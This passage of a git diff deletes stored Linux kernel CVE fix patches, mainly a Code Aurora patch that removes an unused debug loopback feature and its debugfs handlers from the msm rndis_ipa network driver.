--	 * This is the BAMDMA side
--	 */
--	loopback_pipe->dma_sps = sps_alloc_endpoint();
--	if (!loopback_pipe->dma_sps) {
--		RNDIS_IPA_ERROR("sps_alloc_endpoint() failed ");
--		retval = -ENOMEM;
--		goto fail_sps_alloc;
--	}
--
--	retval = sps_get_config(loopback_pipe->dma_sps,
--		&loopback_pipe->dma_connect);
--	if (retval) {
--		RNDIS_IPA_ERROR("sps_get_config() failed (%d)", retval);
--		goto fail_get_cfg;
--	}
--
--	/* Start setting the non IPA ep for SPS driver*/
--	loopback_pipe->dma_connect.mode = loopback_pipe->mode;
--
--	/* SPS_MODE_DEST: DMA end point is the dest (consumer) IPA->DMA */
--	if (loopback_pipe->mode == SPS_MODE_DEST) {
--
--		loopback_pipe->dma_connect.source =
--				loopback_pipe->ipa_sps_connect.ipa_bam_hdl;
--		loopback_pipe->dma_connect.src_pipe_index =
--				loopback_pipe->ipa_sps_connect.ipa_ep_idx;
--		loopback_pipe->dma_connect.destination =
--				rndis_ipa_ctx->bam_dma_hdl;
--		loopback_pipe->dma_connect.dest_pipe_index =
--				loopback_pipe->peer_pipe_index;
--
--	/* SPS_MODE_SRC: DMA end point is the source (producer) DMA->IPA */
--	} else {
--
--		loopback_pipe->dma_connect.source =
--				rndis_ipa_ctx->bam_dma_hdl;
--		loopback_pipe->dma_connect.src_pipe_index =
--				loopback_pipe->peer_pipe_index;
--		loopback_pipe->dma_connect.destination =
--				loopback_pipe->ipa_sps_connect.ipa_bam_hdl;
--		loopback_pipe->dma_connect.dest_pipe_index =
--				loopback_pipe->ipa_sps_connect.ipa_ep_idx;
--
--	}
--
--	loopback_pipe->dma_connect.desc = loopback_pipe->ipa_sps_connect.desc;
--	loopback_pipe->dma_connect.data = loopback_pipe->ipa_sps_connect.data;
--	loopback_pipe->dma_connect.event_thresh = 0x10;
--	/* BAM-to-BAM */
--	loopback_pipe->dma_connect.options = SPS_O_AUTO_ENABLE;
--
--	RNDIS_IPA_DEBUG("doing sps_connect() with - ");
--	RNDIS_IPA_DEBUG("src bam_hdl:0x%lx, src_pipe#:%d",
--			loopback_pipe->dma_connect.source,
--			loopback_pipe->dma_connect.src_pipe_index);
--	RNDIS_IPA_DEBUG("dst bam_hdl:0x%lx, dst_pipe#:%d",
--			loopback_pipe->dma_connect.destination,
--			loopback_pipe->dma_connect.dest_pipe_index);
--
--	retval = sps_connect(loopback_pipe->dma_sps,
--		&loopback_pipe->dma_connect);
--	if (retval) {
--		RNDIS_IPA_ERROR("sps_connect() fail for BAMDMA side (%d)",
--			retval);
--		goto fail_sps_connect;
--	}
--
--	RNDIS_IPA_LOG_EXIT();
--
--	return 0;
--
--fail_sps_connect:
--fail_get_cfg:
--	sps_free_endpoint(loopback_pipe->dma_sps);
--fail_sps_alloc:
--	ipa_disconnect(loopback_pipe->ipa_drv_ep_hdl);
--	return retval;
--}
--
--static void rndis_ipa_destroy_loopback_pipe(
--		struct rndis_loopback_pipe *loopback_pipe)
--{
--	sps_disconnect(loopback_pipe->dma_sps);
--	sps_free_endpoint(loopback_pipe->dma_sps);
--}
--
--/**
-- * rndis_ipa_create_loopback() - create a BAM-DMA loopback
-- *  in order to replace the USB core
-- */
--static int rndis_ipa_create_loopback(struct rndis_ipa_dev *rndis_ipa_ctx)
--{
--	/* The BAM handle should be use as
--	 * source/destination in the sps_connect()
--	 */
--	int retval;
--
--	RNDIS_IPA_LOG_ENTRY();
--
--
--	retval = sps_ctrl_bam_dma_clk(true);
--	if (retval) {
--		RNDIS_IPA_ERROR("fail on enabling BAM-DMA clocks");
--		return -ENODEV;
--	}
--
--	/* Get BAM handle instead of USB handle */
--	rndis_ipa_ctx->bam_dma_hdl = sps_dma_get_bam_handle();
--	if (!rndis_ipa_ctx->bam_dma_hdl) {
--		RNDIS_IPA_ERROR("sps_dma_get_bam_handle() failed");
--		return -ENODEV;
--	}
--	RNDIS_IPA_DEBUG("sps_dma_get_bam_handle() succeeded (0x%x)",
--			rndis_ipa_ctx->bam_dma_hdl);
--
--	/* IPA<-BAMDMA, NetDev Rx path (BAMDMA is the USB stub) */
--	rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_client =
--	IPA_CLIENT_USB_PROD;
--	rndis_ipa_ctx->usb_to_ipa_loopback_pipe.peer_pipe_index =
--		FROM_USB_TO_IPA_BAMDMA;
--	/*DMA EP mode*/
--	rndis_ipa_ctx->usb_to_ipa_loopback_pipe.mode = SPS_MODE_SRC;
--	rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_ep_cfg =
--		&usb_to_ipa_ep_cfg_deaggr_en;
--	rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_callback =
--			rndis_ipa_packet_receive_notify;
--	RNDIS_IPA_DEBUG("setting up IPA<-BAMDAM pipe (RNDIS_IPA RX path)");
--	retval = rndis_ipa_loopback_pipe_create(rndis_ipa_ctx,
--			&rndis_ipa_ctx->usb_to_ipa_loopback_pipe);
--	if (retval) {
--		RNDIS_IPA_ERROR("fail to close IPA->BAMDAM pipe");
--		goto fail_to_usb;
--	}
--	RNDIS_IPA_DEBUG("IPA->BAMDAM pipe successfully connected (TX path)");
--
--	/* IPA->BAMDMA, NetDev Tx path (BAMDMA is the USB stub)*/
--	rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_client =
--		IPA_CLIENT_USB_CONS;
--	/*DMA EP mode*/
--	rndis_ipa_ctx->ipa_to_usb_loopback_pipe.mode = SPS_MODE_DEST;
--	rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_ep_cfg = &ipa_to_usb_ep_cfg;
--	rndis_ipa_ctx->ipa_to_usb_loopback_pipe.peer_pipe_index =
--		FROM_IPA_TO_USB_BAMDMA;
--	rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_callback =
--			rndis_ipa_tx_complete_notify;
--	RNDIS_IPA_DEBUG("setting up IPA->BAMDAM pipe (RNDIS_IPA TX path)");
--	retval = rndis_ipa_loopback_pipe_create(rndis_ipa_ctx,
--			&rndis_ipa_ctx->ipa_to_usb_loopback_pipe);
--	if (retval) {
--		RNDIS_IPA_ERROR("fail to close IPA<-BAMDAM pipe");
--		goto fail_from_usb;
--	}
--	RNDIS_IPA_DEBUG("IPA<-BAMDAM pipe successfully connected(RX path)");
--
--	RNDIS_IPA_LOG_EXIT();
--
--	return 0;
--
--fail_from_usb:
--	rndis_ipa_destroy_loopback_pipe(
--			&rndis_ipa_ctx->usb_to_ipa_loopback_pipe);
--fail_to_usb:
--
--	return retval;
--}
--
--static void rndis_ipa_destroy_loopback(struct rndis_ipa_dev *rndis_ipa_ctx)
--{
--	rndis_ipa_destroy_loopback_pipe(
--			&rndis_ipa_ctx->ipa_to_usb_loopback_pipe);
--	rndis_ipa_destroy_loopback_pipe(
--			&rndis_ipa_ctx->usb_to_ipa_loopback_pipe);
--	sps_dma_free_bam_handle(rndis_ipa_ctx->bam_dma_hdl);
--	if (sps_ctrl_bam_dma_clk(false))
--		RNDIS_IPA_ERROR("fail to disable BAM-DMA clocks");
--}
--
--/**
-- * rndis_ipa_setup_loopback() - create/destroy a loopback on IPA HW
-- *  (as USB pipes loopback) and notify RNDIS_IPA netdev for pipe connected
-- * @enable: flag that determines if the loopback should be created or destroyed
-- * @rndis_ipa_ctx: driver main context
-- *
-- * This function is the main loopback logic.
-- * It shall create/destory the loopback by using BAM-DMA and notify
-- * the netdev accordingly.
-- */
--static int rndis_ipa_setup_loopback(bool enable,
--		struct rndis_ipa_dev *rndis_ipa_ctx)
--{
--	int retval;
--
--	if (!enable) {
--		rndis_ipa_destroy_loopback(rndis_ipa_ctx);
--		RNDIS_IPA_DEBUG("loopback destroy done");
--		retval = rndis_ipa_pipe_disconnect_notify(rndis_ipa_ctx);
--		if (retval) {
--			RNDIS_IPA_ERROR("connect notify fail");
--			return -ENODEV;
--		}
--		return 0;
--	}
--
--	RNDIS_IPA_DEBUG("creating loopback (instead of USB core)");
--	retval = rndis_ipa_create_loopback(rndis_ipa_ctx);
--	RNDIS_IPA_DEBUG("creating loopback- %s", (retval ? "FAIL" : "OK"));
--	if (retval) {
--		RNDIS_IPA_ERROR("Fail to connect loopback");
--		return -ENODEV;
--	}
--	retval = rndis_ipa_pipe_connect_notify(
--			rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_drv_ep_hdl,
--			rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_drv_ep_hdl,
--			BAM_DMA_DATA_FIFO_SIZE,
--			15,
--			BAM_DMA_DATA_FIFO_SIZE - rndis_ipa_ctx->net->mtu,
--			rndis_ipa_ctx);
--	if (retval) {
--		RNDIS_IPA_ERROR("connect notify fail");
--		return -ENODEV;
--	}
--
--	return 0;
--
--}
--
- static int rndis_ipa_init_module(void)
- {
- 	pr_info("RNDIS_IPA module is loaded.");
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5868/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2016-5868/4.4/0003.patch
deleted file mode 100644
index fc860b4f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5868/4.4/0003.patch
+++ /dev/null
@@ -1,525 +0,0 @@
-From fbb765a3f813f5cc85ddab21487fd65f24bf6a8c Mon Sep 17 00:00:00 2001
-From: Ghanim Fodi <gfodi@codeaurora.org>
-Date: Tue, 27 Dec 2016 13:32:35 +0200
-Subject: msm: rndis_ipa: Remove rndis_ipa loopback functionality
-
-Rndis_ipa loopback functionality at rndis_ipa driver
-is a debug functionality that is not used.
-
-Change-Id: Ibbcb26d3871cffeb46b028efcf4d428e88eb9e10
-CRs-fixed: 1104431
-Signed-off-by: Ghanim Fodi <gfodi@codeaurora.org>
----
- drivers/net/ethernet/msm/rndis_ipa.c | 432 +----------------------------------
- 1 file changed, 1 insertion(+), 431 deletions(-)
-
-diff --git a/drivers/net/ethernet/msm/rndis_ipa.c b/drivers/net/ethernet/msm/rndis_ipa.c
-index 15cfb1d..62e72ca 100644
---- a/drivers/net/ethernet/msm/rndis_ipa.c
-+++ b/drivers/net/ethernet/msm/rndis_ipa.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -135,29 +135,6 @@ enum rndis_ipa_operation {
- 	RNDIS_IPA_DEBUG("Driver state: %s\n",\
- 	rndis_ipa_state_string(ctx->state));
- 
--/**
-- * struct rndis_loopback_pipe - hold all information needed for
-- *  pipe loopback logic
-- */
--struct rndis_loopback_pipe {
--	struct sps_pipe          *ipa_sps;
--	struct ipa_sps_params ipa_sps_connect;
--	struct ipa_connect_params ipa_connect_params;
--
--	struct sps_pipe          *dma_sps;
--	struct sps_connect        dma_connect;
--
--	struct sps_alloc_dma_chan dst_alloc;
--	struct sps_dma_chan       ipa_sps_channel;
--	enum sps_mode mode;
--	u32 ipa_peer_bam_hdl;
--	u32 peer_pipe_index;
--	u32 ipa_drv_ep_hdl;
--	u32 ipa_pipe_index;
--	enum ipa_client_type ipa_client;
--	ipa_notify_cb ipa_callback;
--	struct ipa_ep_cfg *ipa_ep_cfg;
--};
- 
- /**
-  * struct rndis_ipa_dev - main driver context parameters
-@@ -172,13 +149,9 @@ struct rndis_loopback_pipe {
-  * @rx_dump_enable: dump all Rx packets
-  * @icmp_filter: allow all ICMP packet to pass through the filters
-  * @rm_enable: flag that enable/disable Resource manager request prior to Tx
-- * @loopback_enable:  flag that enable/disable USB stub loopback
-  * @deaggregation_enable: enable/disable IPA HW deaggregation logic
-  * @during_xmit_error: flags that indicate that the driver is in a middle
-  *  of error handling in Tx path
-- * @usb_to_ipa_loopback_pipe: usb to ipa (Rx) pipe representation for loopback
-- * @ipa_to_usb_loopback_pipe: ipa to usb (Tx) pipe representation for loopback
-- * @bam_dma_hdl: handle representing bam-dma, used for loopback logic
-  * @directory: holds all debug flags used by the driver to allow cleanup
-  *  for driver unload
-  * @eth_ipv4_hdr_hdl: saved handle for ipv4 header-insertion table
-@@ -208,12 +181,8 @@ struct rndis_ipa_dev {
- 	bool rx_dump_enable;
- 	bool icmp_filter;
- 	bool rm_enable;
--	bool loopback_enable;
- 	bool deaggregation_enable;
- 	bool during_xmit_error;
--	struct rndis_loopback_pipe usb_to_ipa_loopback_pipe;
--	struct rndis_loopback_pipe ipa_to_usb_loopback_pipe;
--	u32 bam_dma_hdl;
- 	struct dentry *directory;
- 	uint32_t eth_ipv4_hdr_hdl;
- 	uint32_t eth_ipv6_hdr_hdl;
-@@ -277,31 +246,12 @@ static int resource_request(struct rndis_ipa_dev *rndis_ipa_ctx);
- static void resource_release(struct rndis_ipa_dev *rndis_ipa_ctx);
- static netdev_tx_t rndis_ipa_start_xmit(struct sk_buff *skb,
- 					struct net_device *net);
--static int rndis_ipa_loopback_pipe_create(
--		struct rndis_ipa_dev *rndis_ipa_ctx,
--		struct rndis_loopback_pipe *loopback_pipe);
--static void rndis_ipa_destroy_loopback_pipe(
--		struct rndis_loopback_pipe *loopback_pipe);
--static int rndis_ipa_create_loopback(struct rndis_ipa_dev *rndis_ipa_ctx);
--static void rndis_ipa_destroy_loopback(struct rndis_ipa_dev *rndis_ipa_ctx);
--static int rndis_ipa_setup_loopback(bool enable,
--		struct rndis_ipa_dev *rndis_ipa_ctx);
--static int rndis_ipa_debugfs_loopback_open(struct inode *inode,
--		struct file *file);
- static int rndis_ipa_debugfs_atomic_open(struct inode *inode,
- 		struct file *file);
- static int rndis_ipa_debugfs_aggr_open(struct inode *inode,
- 		struct file *file);
- static ssize_t rndis_ipa_debugfs_aggr_write(struct file *file,
- 		const char __user *buf, size_t count, loff_t *ppos);
--static ssize_t rndis_ipa_debugfs_loopback_write(struct file *file,
--		const char __user *buf, size_t count, loff_t *ppos);
--static ssize_t rndis_ipa_debugfs_enable_write(struct file *file,
--		const char __user *buf, size_t count, loff_t *ppos);
--static ssize_t rndis_ipa_debugfs_enable_read(struct file *file,
--		char __user *ubuf, size_t count, loff_t *ppos);
--static ssize_t rndis_ipa_debugfs_loopback_read(struct file *file,
--		char __user *ubuf, size_t count, loff_t *ppos);
- static ssize_t rndis_ipa_debugfs_atomic_read(struct file *file,
- 		char __user *ubuf, size_t count, loff_t *ppos);
- static void rndis_ipa_dump_skb(struct sk_buff *skb);
-@@ -336,12 +286,6 @@ const struct file_operations rndis_ipa_debugfs_atomic_ops = {
- 	.read = rndis_ipa_debugfs_atomic_read,
- };
- 
--const struct file_operations rndis_ipa_loopback_ops = {
--		.open = rndis_ipa_debugfs_loopback_open,
--		.read = rndis_ipa_debugfs_loopback_read,
--		.write = rndis_ipa_debugfs_loopback_write,
--};
--
- const struct file_operations rndis_ipa_aggr_ops = {
- 		.open = rndis_ipa_debugfs_aggr_open,
- 		.write = rndis_ipa_debugfs_aggr_write,
-@@ -2195,14 +2139,6 @@ static int rndis_ipa_debugfs_init(struct rndis_ipa_dev *rndis_ipa_ctx)
- 		goto fail_file;
- 	}
- 
--	file = debugfs_create_file("loopback_enable", flags_read_write,
--				rndis_ipa_ctx->directory,
--				rndis_ipa_ctx, &rndis_ipa_loopback_ops);
--	if (!file) {
--		RNDIS_IPA_ERROR("could not create outstanding file\n");
--		goto fail_file;
--	}
--
- 	file = debugfs_create_u8("state", flags_read_only,
- 			rndis_ipa_ctx->directory, (u8 *)&rndis_ipa_ctx->state);
- 	if (!file) {
-@@ -2358,59 +2294,6 @@ static ssize_t rndis_ipa_debugfs_aggr_write(struct file *file,
- 	return count;
- }
- 
--static int rndis_ipa_debugfs_loopback_open(struct inode *inode,
--		struct file *file)
--{
--	struct rndis_ipa_dev *rndis_ipa_ctx = inode->i_private;
--	file->private_data = rndis_ipa_ctx;
--
--	return 0;
--}
--
--static ssize_t rndis_ipa_debugfs_loopback_read(struct file *file,
--		char __user *ubuf, size_t count, loff_t *ppos)
--{
--	int cnt;
--	struct rndis_ipa_dev *rndis_ipa_ctx = file->private_data;
--
--	file->private_data = &rndis_ipa_ctx->loopback_enable;
--
--	cnt = rndis_ipa_debugfs_enable_read(file,
--			ubuf, count, ppos);
--
--	return cnt;
--}
--
--static ssize_t rndis_ipa_debugfs_loopback_write(struct file *file,
--		const char __user *buf, size_t count, loff_t *ppos)
--{
--	int retval;
--	int cnt;
--	struct rndis_ipa_dev *rndis_ipa_ctx = file->private_data;
--	bool old_state = rndis_ipa_ctx->loopback_enable;
--
--	file->private_data = &rndis_ipa_ctx->loopback_enable;
--
--	cnt = rndis_ipa_debugfs_enable_write(file,
--			buf, count, ppos);
--
--	RNDIS_IPA_DEBUG("loopback_enable was set to:%d->%d\n",
--			old_state, rndis_ipa_ctx->loopback_enable);
--
--	if (old_state == rndis_ipa_ctx->loopback_enable) {
--		RNDIS_IPA_ERROR("NOP - same state\n");
--		return cnt;
--	}
--
--	retval = rndis_ipa_setup_loopback(
--				rndis_ipa_ctx->loopback_enable,
--				rndis_ipa_ctx);
--	if (retval)
--		rndis_ipa_ctx->loopback_enable = old_state;
--
--	return cnt;
--}
--
- static int rndis_ipa_debugfs_atomic_open(struct inode *inode, struct file *file)
- {
- 	struct rndis_ipa_dev *rndis_ipa_ctx = inode->i_private;
-@@ -2441,319 +2324,6 @@ static ssize_t rndis_ipa_debugfs_atomic_read(struct file *file,
- 	return simple_read_from_buffer(ubuf, count, ppos, atomic_str, nbytes);
- }
- 
--static ssize_t rndis_ipa_debugfs_enable_read(struct file *file,
--		char __user *ubuf, size_t count, loff_t *ppos)
--{
--	int nbytes;
--	int size = 0;
--	int ret;
--	loff_t pos;
--	u8 enable_str[sizeof(char)*3] = {0};
--	bool *enable = file->private_data;
--	pos = *ppos;
--	nbytes = scnprintf(enable_str, sizeof(enable_str), "%d\n", *enable);
--	ret = simple_read_from_buffer(ubuf, count, ppos, enable_str, nbytes);
--	if (ret < 0) {
--		RNDIS_IPA_ERROR("simple_read_from_buffer problem\n");
--		return ret;
--	}
--	size += ret;
--	count -= nbytes;
--	*ppos = pos + size;
--	return size;
--}
--
--static ssize_t rndis_ipa_debugfs_enable_write(struct file *file,
--		const char __user *buf, size_t count, loff_t *ppos)
--{
--	unsigned long missing;
--	char input;
--	bool *enable = file->private_data;
--	if (count != sizeof(input) + 1) {
--		RNDIS_IPA_ERROR("wrong input length(%zd)\n", count);
--		return -EINVAL;
--	}
--	if (!buf) {
--		RNDIS_IPA_ERROR("Bad argument\n");
--		return -EINVAL;
--	}
--	missing = copy_from_user(&input, buf, 1);
--	if (missing)
--		return -EFAULT;
--	RNDIS_IPA_DEBUG("input received %c\n", input);
--	*enable = input - '0';
--	RNDIS_IPA_DEBUG("value was set to %d\n", *enable);
--	return count;
--}
--
--/**
-- * Connects IPA->BAMDMA
-- * This shall simulate the path from IPA to USB
-- * Allowing the driver TX path
-- */
--static int rndis_ipa_loopback_pipe_create(
--		struct rndis_ipa_dev *rndis_ipa_ctx,
--		struct rndis_loopback_pipe *loopback_pipe)
--{
--	int retval;
--
--	RNDIS_IPA_LOG_ENTRY();
--
--	/* SPS pipe has two side handshake
--	 * This is the first handshake of IPA->BAMDMA,
--	 * This is the IPA side
--	 */
--	loopback_pipe->ipa_connect_params.client = loopback_pipe->ipa_client;
--	loopback_pipe->ipa_connect_params.client_bam_hdl =
--			rndis_ipa_ctx->bam_dma_hdl;
--	loopback_pipe->ipa_connect_params.client_ep_idx =
--		loopback_pipe->peer_pipe_index;
--	loopback_pipe->ipa_connect_params.desc_fifo_sz = BAM_DMA_DESC_FIFO_SIZE;
--	loopback_pipe->ipa_connect_params.data_fifo_sz = BAM_DMA_DATA_FIFO_SIZE;
--	loopback_pipe->ipa_connect_params.notify = loopback_pipe->ipa_callback;
--	loopback_pipe->ipa_connect_params.priv = rndis_ipa_ctx;
--	loopback_pipe->ipa_connect_params.ipa_ep_cfg =
--		*(loopback_pipe->ipa_ep_cfg);
--
--	/* loopback_pipe->ipa_sps_connect is out param */
--	retval = ipa_connect(&loopback_pipe->ipa_connect_params,
--			&loopback_pipe->ipa_sps_connect,
--			&loopback_pipe->ipa_drv_ep_hdl);
--	if (retval) {
--		RNDIS_IPA_ERROR("ipa_connect() fail (%d)", retval);
--		return retval;
--	}
--	RNDIS_IPA_DEBUG("ipa_connect() succeeded, ipa_drv_ep_hdl=%d",
--			loopback_pipe->ipa_drv_ep_hdl);
--
--	/* SPS pipe has two side handshake
--	 * This is the second handshake of IPA->BAMDMA,
--	 * This is the BAMDMA side
--	 */
--	loopback_pipe->dma_sps = sps_alloc_endpoint();
--	if (!loopback_pipe->dma_sps) {
--		RNDIS_IPA_ERROR("sps_alloc_endpoint() failed ");
--		retval = -ENOMEM;
--		goto fail_sps_alloc;
--	}
--
--	retval = sps_get_config(loopback_pipe->dma_sps,
--		&loopback_pipe->dma_connect);
--	if (retval) {
--		RNDIS_IPA_ERROR("sps_get_config() failed (%d)", retval);
--		goto fail_get_cfg;
--	}
--
--	/* Start setting the non IPA ep for SPS driver*/
--	loopback_pipe->dma_connect.mode = loopback_pipe->mode;
--
--	/* SPS_MODE_DEST: DMA end point is the dest (consumer) IPA->DMA */
--	if (loopback_pipe->mode == SPS_MODE_DEST) {
--
--		loopback_pipe->dma_connect.source =
--				loopback_pipe->ipa_sps_connect.ipa_bam_hdl;
--		loopback_pipe->dma_connect.src_pipe_index =
--				loopback_pipe->ipa_sps_connect.ipa_ep_idx;
--		loopback_pipe->dma_connect.destination =
--				rndis_ipa_ctx->bam_dma_hdl;
--		loopback_pipe->dma_connect.dest_pipe_index =
--				loopback_pipe->peer_pipe_index;
--
--	/* SPS_MODE_SRC: DMA end point is the source (producer) DMA->IPA */
--	} else {
--
--		loopback_pipe->dma_connect.source =
--				rndis_ipa_ctx->bam_dma_hdl;
--		loopback_pipe->dma_connect.src_pipe_index =
--				loopback_pipe->peer_pipe_index;
--		loopback_pipe->dma_connect.destination =
--				loopback_pipe->ipa_sps_connect.ipa_bam_hdl;
--		loopback_pipe->dma_connect.dest_pipe_index =
--				loopback_pipe->ipa_sps_connect.ipa_ep_idx;
--
--	}
--
--	loopback_pipe->dma_connect.desc = loopback_pipe->ipa_sps_connect.desc;
--	loopback_pipe->dma_connect.data = loopback_pipe->ipa_sps_connect.data;
--	loopback_pipe->dma_connect.event_thresh = 0x10;
--	/* BAM-to-BAM */
--	loopback_pipe->dma_connect.options = SPS_O_AUTO_ENABLE;
--
--	RNDIS_IPA_DEBUG("doing sps_connect() with - ");
--	RNDIS_IPA_DEBUG("src bam_hdl:0x%lx, src_pipe#:%d",
--			loopback_pipe->dma_connect.source,
--			loopback_pipe->dma_connect.src_pipe_index);
--	RNDIS_IPA_DEBUG("dst bam_hdl:0x%lx, dst_pipe#:%d",
--			loopback_pipe->dma_connect.destination,
--			loopback_pipe->dma_connect.dest_pipe_index);
--
--	retval = sps_connect(loopback_pipe->dma_sps,
--		&loopback_pipe->dma_connect);
--	if (retval) {
--		RNDIS_IPA_ERROR("sps_connect() fail for BAMDMA side (%d)",
--			retval);
--		goto fail_sps_connect;
--	}
--
--	RNDIS_IPA_LOG_EXIT();
--
--	return 0;
--
--fail_sps_connect:
--fail_get_cfg:
--	sps_free_endpoint(loopback_pipe->dma_sps);
--fail_sps_alloc:
--	ipa_disconnect(loopback_pipe->ipa_drv_ep_hdl);
--	return retval;
--}
--
--static void rndis_ipa_destroy_loopback_pipe(
--		struct rndis_loopback_pipe *loopback_pipe)
--{
--	sps_disconnect(loopback_pipe->dma_sps);
--	sps_free_endpoint(loopback_pipe->dma_sps);
--}
--
--/**
-- * rndis_ipa_create_loopback() - create a BAM-DMA loopback
-- *  in order to replace the USB core
-- */
--static int rndis_ipa_create_loopback(struct rndis_ipa_dev *rndis_ipa_ctx)
--{
--	/* The BAM handle should be use as
--	 * source/destination in the sps_connect()
--	 */
--	int retval;
--
--	RNDIS_IPA_LOG_ENTRY();
--
--
--	retval = sps_ctrl_bam_dma_clk(true);
--	if (retval) {
--		RNDIS_IPA_ERROR("fail on enabling BAM-DMA clocks");
--		return -ENODEV;
--	}
--
--	/* Get BAM handle instead of USB handle */
--	rndis_ipa_ctx->bam_dma_hdl = sps_dma_get_bam_handle();
--	if (!rndis_ipa_ctx->bam_dma_hdl) {
--		RNDIS_IPA_ERROR("sps_dma_get_bam_handle() failed");
--		return -ENODEV;
--	}
--	RNDIS_IPA_DEBUG("sps_dma_get_bam_handle() succeeded (0x%x)",
--			rndis_ipa_ctx->bam_dma_hdl);
--
--	/* IPA<-BAMDMA, NetDev Rx path (BAMDMA is the USB stub) */
--	rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_client =
--	IPA_CLIENT_USB_PROD;
--	rndis_ipa_ctx->usb_to_ipa_loopback_pipe.peer_pipe_index =
--		FROM_USB_TO_IPA_BAMDMA;
--	/*DMA EP mode*/
--	rndis_ipa_ctx->usb_to_ipa_loopback_pipe.mode = SPS_MODE_SRC;
--	rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_ep_cfg =
--		&usb_to_ipa_ep_cfg_deaggr_en;
--	rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_callback =
--			rndis_ipa_packet_receive_notify;
--	RNDIS_IPA_DEBUG("setting up IPA<-BAMDAM pipe (RNDIS_IPA RX path)");
--	retval = rndis_ipa_loopback_pipe_create(rndis_ipa_ctx,
--			&rndis_ipa_ctx->usb_to_ipa_loopback_pipe);
--	if (retval) {
--		RNDIS_IPA_ERROR("fail to close IPA->BAMDAM pipe");
--		goto fail_to_usb;
--	}
--	RNDIS_IPA_DEBUG("IPA->BAMDAM pipe successfully connected (TX path)");
--
--	/* IPA->BAMDMA, NetDev Tx path (BAMDMA is the USB stub)*/
--	rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_client =
--		IPA_CLIENT_USB_CONS;
--	/*DMA EP mode*/
--	rndis_ipa_ctx->ipa_to_usb_loopback_pipe.mode = SPS_MODE_DEST;
--	rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_ep_cfg = &ipa_to_usb_ep_cfg;
--	rndis_ipa_ctx->ipa_to_usb_loopback_pipe.peer_pipe_index =
--		FROM_IPA_TO_USB_BAMDMA;
--	rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_callback =
--			rndis_ipa_tx_complete_notify;
--	RNDIS_IPA_DEBUG("setting up IPA->BAMDAM pipe (RNDIS_IPA TX path)");
--	retval = rndis_ipa_loopback_pipe_create(rndis_ipa_ctx,
--			&rndis_ipa_ctx->ipa_to_usb_loopback_pipe);
--	if (retval) {
--		RNDIS_IPA_ERROR("fail to close IPA<-BAMDAM pipe");
--		goto fail_from_usb;
--	}
--	RNDIS_IPA_DEBUG("IPA<-BAMDAM pipe successfully connected(RX path)");
--
--	RNDIS_IPA_LOG_EXIT();
--
--	return 0;
--
--fail_from_usb:
--	rndis_ipa_destroy_loopback_pipe(
--			&rndis_ipa_ctx->usb_to_ipa_loopback_pipe);
--fail_to_usb:
--
--	return retval;
--}
--
--static void rndis_ipa_destroy_loopback(struct rndis_ipa_dev *rndis_ipa_ctx)
--{
--	rndis_ipa_destroy_loopback_pipe(
--			&rndis_ipa_ctx->ipa_to_usb_loopback_pipe);
--	rndis_ipa_destroy_loopback_pipe(
--			&rndis_ipa_ctx->usb_to_ipa_loopback_pipe);
--	sps_dma_free_bam_handle(rndis_ipa_ctx->bam_dma_hdl);
--	if (sps_ctrl_bam_dma_clk(false))
--		RNDIS_IPA_ERROR("fail to disable BAM-DMA clocks");
--}
--
--/**
-- * rndis_ipa_setup_loopback() - create/destroy a loopback on IPA HW
-- *  (as USB pipes loopback) and notify RNDIS_IPA netdev for pipe connected
-- * @enable: flag that determines if the loopback should be created or destroyed
-- * @rndis_ipa_ctx: driver main context
-- *
-- * This function is the main loopback logic.
-- * It shall create/destory the loopback by using BAM-DMA and notify
-- * the netdev accordingly.
-- */
--static int rndis_ipa_setup_loopback(bool enable,
--		struct rndis_ipa_dev *rndis_ipa_ctx)
--{
--	int retval;
--
--	if (!enable) {
--		rndis_ipa_destroy_loopback(rndis_ipa_ctx);
--		RNDIS_IPA_DEBUG("loopback destroy done");
--		retval = rndis_ipa_pipe_disconnect_notify(rndis_ipa_ctx);
--		if (retval) {
--			RNDIS_IPA_ERROR("connect notify fail");
--			return -ENODEV;
--		}
--		return 0;
--	}
--
--	RNDIS_IPA_DEBUG("creating loopback (instead of USB core)");
--	retval = rndis_ipa_create_loopback(rndis_ipa_ctx);
--	RNDIS_IPA_DEBUG("creating loopback- %s", (retval ? "FAIL" : "OK"));
--	if (retval) {
--		RNDIS_IPA_ERROR("Fail to connect loopback");
--		return -ENODEV;
--	}
--	retval = rndis_ipa_pipe_connect_notify(
--			rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_drv_ep_hdl,
--			rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_drv_ep_hdl,
--			BAM_DMA_DATA_FIFO_SIZE,
--			15,
--			BAM_DMA_DATA_FIFO_SIZE - rndis_ipa_ctx->net->mtu,
--			rndis_ipa_ctx);
--	if (retval) {
--		RNDIS_IPA_ERROR("connect notify fail");
--		return -ENODEV;
--	}
--
--	return 0;
--
--}
--
- static int rndis_ipa_init_module(void)
- {
- 	pr_info("RNDIS_IPA module is loaded.");
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5870/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5870/ANY/0001.patch
deleted file mode 100644
index c3039936..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5870/ANY/0001.patch
+++ /dev/null
@@ -1,44 +0,0 @@
